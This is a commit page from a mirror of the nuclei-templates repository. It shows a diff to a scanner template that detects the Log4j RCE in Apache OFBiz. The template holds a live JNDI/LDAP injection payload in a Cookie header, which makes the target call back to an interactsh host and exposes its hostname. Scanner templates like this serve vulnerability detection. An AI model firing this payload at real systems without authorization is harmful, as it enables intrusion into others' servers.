daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update apache-ofbiz-log4j-rce.yaml

patch-1
Ritik Chaddha 2023-05-04 11:05:06 +05:30 committed by GitHub
parent 0c049e028e
commit 05eb753985
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml
View File

@ -30,7 +30,7 @@ http:
- |
GET /webtools/control/main HTTP/1.1
Host: {{Hostname}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}
Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}}
matchers-condition: and
matchers:
@ -45,6 +45,16 @@ http:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1